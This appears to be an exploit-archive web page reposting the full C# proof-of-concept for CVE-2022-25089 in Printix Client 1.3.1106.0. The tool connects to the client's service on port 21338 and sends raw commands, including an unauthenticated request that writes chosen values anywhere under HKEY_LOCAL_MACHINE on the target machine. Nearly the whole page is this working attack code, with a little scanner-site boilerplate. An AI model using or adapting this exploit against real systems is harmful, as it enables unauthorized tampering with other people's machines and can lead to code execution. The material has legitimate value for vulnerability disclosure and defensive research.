Registerprintix client 1.3.1106.0 remote code execution (rce)
▸▸▸ Exploit & Vulnerability >> remote exploit & windows vulnerability
Online Vulnerability Scanner Tools
Code...
# Exploit Title: Printix Client 1.3.1106.0 - Remote Code Execution (RCE) # Date: 3/1/2022 # Exploit Author: Logan Latvala # Vendor Homepage: https://printix.net # Software Link: https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip # Version: <= 1.3.1106.0 # Tested on: Windows 7, Windows 8, Windows 10, Windows 11 # CVE : CVE-2022-25089 # Github for project: https://github.com/ComparedArray/printix-CVE-2022-25089 using Microsoft.Win32; using Newtonsoft.Json; using Newtonsoft.Json.Converters; using System; using System.Collections.Generic; using System.Diagnostics; using System.Linq; using System.Text; using System.Threading; using System.Threading.Tasks; /** * ________________________________________ * * Printix Vulnerability, CVE-2022-25089 * Part of a Printix Vulnerability series * Author: Logan Latvala * Github: https://github.com/ComparedArray/printix-CVE-2022-25089 * ________________________________________ * */ namespace ConsoleApp1a { public class PersistentRegistryData { public PersistentRegistryCmds cmd; public string path; public int VDIType; public byte[] registryData; } [JsonConverter(typeof(StringEnumConverter))] public enum PersistentRegistryCmds { StoreData = 1, DeleteSubTree, RestoreData } public class Session { public int commandNumber { get; set; } public string host { get; set; } public string data { get; set; } public string sessionName { get; set; } public Session(int commandSessionNumber = 0) { commandNumber = commandSessionNumber; switch (commandSessionNumber) { //Incase it's initiated, kill it immediately. case (0): Environment.Exit(0x001); break; //Incase the Ping request is sent though, get its needed data. case (2): Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n"); Console.Write("IP: "); host = Console.ReadLine(); Console.WriteLine("Host address set to: " + host); data = "pingData"; sessionName = "PingerRinger"; break; //Incase the RegEdit request is sent though, get its needed data. case (49): Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n"); Console.Write("IP: "); host = Console.ReadLine(); Console.WriteLine("Host address set to: " + host); PersistentRegistryData persistentRegistryData = new PersistentRegistryData(); persistentRegistryData.cmd = PersistentRegistryCmds.RestoreData; persistentRegistryData.VDIType = 12; //(int)DefaultValues.VDIType; //persistentRegistryData.path = "printix\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName"; Console.WriteLine("\n What Node starting from \\\\Local-Machine\\ would you like to select? \n"); Console.WriteLine("Example: HKEY_LOCAL_MACHINE\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName\n"); Console.WriteLine("You can only change values in HKEY_LOCAL_MACHINE"); Console.Write("Registry Node: "); persistentRegistryData.path = "" + Console.ReadLine().Replace("HKEY_LOCAL_MACHINE","printix"); Console.WriteLine("Full Address Set To: " + persistentRegistryData.path); //persistentRegistryData.registryData = new byte[2]; //byte[] loader = selectDataType("Intel(R) Capability Licensing stuffidkreally", RegistryValueKind.String); Console.WriteLine("\n What Data type are you using? \n1. String 2. Dword 3. Qword 4. Multi String \n"); Console.Write("Type: "); int dataF = int.Parse(Console.ReadLine()); Console.WriteLine("Set Data to: " + dataF); Console.WriteLine("\n What value is your type? \n"); Console.Write("Value: "); string dataB = Console.ReadLine(); Console.WriteLine("Set Data to: " + dataF); byte[] loader = null; List<byte> byteContainer = new List<byte>(); //Dword = 4 //SET THIS NUMBER TO THE TYPE OF DATA YOU ARE USING! (CHECK ABOVE FUNCITON selectDataType()!) switch (dataF) { case (1): loader = selectDataType(dataB, RegistryValueKind.String); byteContainer.Add(1); break; case (2): loader = selectDataType(int.Parse(dataB), RegistryValueKind.DWord); byteContainer.Add(4); break; case (3): loader = selectDataType(long.Parse(dataB), RegistryValueKind.QWord); byteContainer.Add(11); break; case (4): loader = selectDataType(dataB.Split('%'), RegistryValueKind.MultiString); byteContainer.Add(7); break; } int pathHolder = 0; foreach (byte bit in loader) { pathHolder++; byteContainer.Add(bit); } persistentRegistryData.registryData = byteContainer.ToArray(); //added stuff: //PersistentRegistryData data = new PersistentRegistryData(); //data.cmd = PersistentRegistryCmds.RestoreData; //data.path = ""; //data.cmd Console.WriteLine(JsonConvert.SerializeObject(persistentRegistryData)); data = JsonConvert.SerializeObject(persistentRegistryData); break; //Custom cases, such as custom JSON Inputs and more. case (100): Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n"); Console.Write("IP: "); host = Console.ReadLine(); Console.WriteLine("Host address set to: " + host); Console.WriteLine("\n What Data Should Be Sent?\n"); Console.Write("Data: "); data = Console.ReadLine(); Console.WriteLine("Data set to: " + data); Console.WriteLine("\n What Session Name Should Be Used? \n"); Console.Write("Session Name: "); sessionName = Console.ReadLine(); Console.WriteLine("Session name set to: " + sessionName); break; } } public static byte[] selectDataType(object value, RegistryValueKind format) { byte[] array = new byte[50]; switch (format) { case RegistryValueKind.String: //1 array = Encoding.UTF8.GetBytes((string)value); break; case RegistryValueKind.DWord://4 array = ((!(value.GetType() == typeof(int))) ? BitConverter.GetBytes((long)value) : BitConverter.GetBytes((int)value)); break; case RegistryValueKind.QWord://11 if (value == null) { value = 0L; } array = BitConverter.GetBytes((long)value); break; case RegistryValueKind.MultiString://7 { if (value == null) { value = new string[1] { string.Empty }; } string[] array2 = (string[])value; foreach (string s in array2) { byte[] bytes = Encoding.UTF8.GetBytes(s); byte[] second = new byte[1] { (byte)bytes.Length }; array = array.Concat(second).Concat(bytes).ToArray(); } break; } } return array; } } class CVESUBMISSION { static void Main(string[] args) { FORCERESTART: try { //Edit any registry without auth: //Use command 49, use the code provided on the desktop... //This modifies it directly, so no specific username is needed. :D //The command parameter, a list of commands is below. int command = 43; //To force the user to input variables or not. bool forceCustomInput = false; //The data to send, this isn't flexible and should be used only for specific examples. //Try to keep above 4 characters if you're just shoving things into the command. string data = "{\"profileID\":1,\"result\":true}"; //The username to use. //This is to fulfill the requriements whilst in development mode. DefaultValues.CurrentSessName = "printixMDNs7914"; //The host to connect to. DEFAULT= "localhost" string host = "192.168.1.29"; // Configuration Above InvalidInputLabel: Console.Clear(); Console.WriteLine("Please select the certificate you want to use with port 21338."); //Deprecated, certificates are no longer needed to verify, as clientside only uses the self-signed certificates now. Console.WriteLine("Already selected, client authentication isn't needed."); Console.WriteLine(" /───────────────────────────\\ "); Console.WriteLine("\nWhat would you like to do?"); Console.WriteLine("\n 1. Send Ping Request"); Console.WriteLine(" 2. Send Registry Edit Request"); Console.WriteLine(" 3. Send Custom Request"); Console.WriteLine(" 4. Experimental Mode (Beta)\n"); Console.Write("I choose option # "); try { switch (int.Parse(Console.ReadLine().ToLower())) { case (1): Session session = new Session(2); command = session.commandNumber; host = session.host; data = session.data; DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200); break; case (2): Session sessionTwo = new Session(49); command = sessionTwo.commandNumber; host = sessionTwo.host; data = sessionTwo.data; DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200); break; case (3): Console.WriteLine("What command number do you want to input?"); command = int.Parse(Console.ReadLine().ToString()); Console.WriteLine("What IP would you like to use? (Default = localhost)"); host = Console.ReadLine(); Console.WriteLine("What data do you want to send? (Keep over 4 chars if you are not sure!)"); data = Console.ReadLine(); Console.WriteLine("What session name do you want to use? "); DefaultValues.CurrentSessName = Console.ReadLine(); break; case (4): Console.WriteLine("Not yet implemented."); break; } } catch (Exception e) { Console.WriteLine("Invalid Input!"); goto InvalidInputLabel; } Console.WriteLine("Proof Of Concept For CVE-2022-25089 | Version: 1.3.24 | Created by Logan Latvala"); Console.WriteLine("This is a RAW API, in which you may get unintended results from usage.\n"); CompCommClient client = new CompCommClient(); byte[] responseStorage = new byte[25555]; int responseCMD = 0; client.Connect(host, 21338, 3, 10000); client.SendMessage(command, Encoding.UTF8.GetBytes(data)); // Theory: There is always a message being sent, yet it doesn't read it, or can't intercept it. // Check for output multiple times, and see if this is conclusive. //client.SendMessage(51, Encoding.ASCII.GetBytes(data)); new Thread(() => { //Thread.Sleep(4000); if (client.Connected()) { int cam = 0; // 4 itterations of loops, may be lifted in the future. while (cam < 5) { //Reads the datastream and keeps returning results. //Thread.Sleep(100); try { try { if (responseStorage?.Any() == true) { //List<byte> byo1 = responseStorage.ToList(); if (!Encoding.UTF8.GetString(responseStorage).Contains("Caption")) { foreach (char cam2 in Encoding.UTF8.GetString(responseStorage)) { if (!char.IsWhiteSpace(cam2) && char.IsLetterOrDigit(cam2) || char.IsPunctuation(cam2)) { Console.Write(cam2); } } }else { } } } catch (Exception e) { Debug.WriteLine(e); } client.Read(out responseCMD, out responseStorage); } catch (Exception e) { goto ReadException; } Thread.Sleep(100); cam++; //Console.WriteLine(cam); } } else { Console.WriteLine("[WARNING]: Client is Disconnected!"); } ReadException: try { Console.WriteLine("Command Variable Response: " + responseCMD); Console.WriteLine(Encoding.UTF8.GetString(responseStorage) + " || " + responseCMD); client.disConnect(); } catch (Exception e) { Console.WriteLine("After 4.2 Seconds, there has been no response!"); client.disConnect(); } }).Start(); Console.WriteLine(responseCMD); Console.ReadLine(); } catch (Exception e) { Console.WriteLine(e); Console.ReadLine(); //Environment.Exit(e.HResult); } goto FORCERESTART; } } }
Printix client 1.3.1106.0 remote code execution (rce) Vulnerability / Exploit Source : Printix client 1.3.1106.0 remote code execution (rce)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes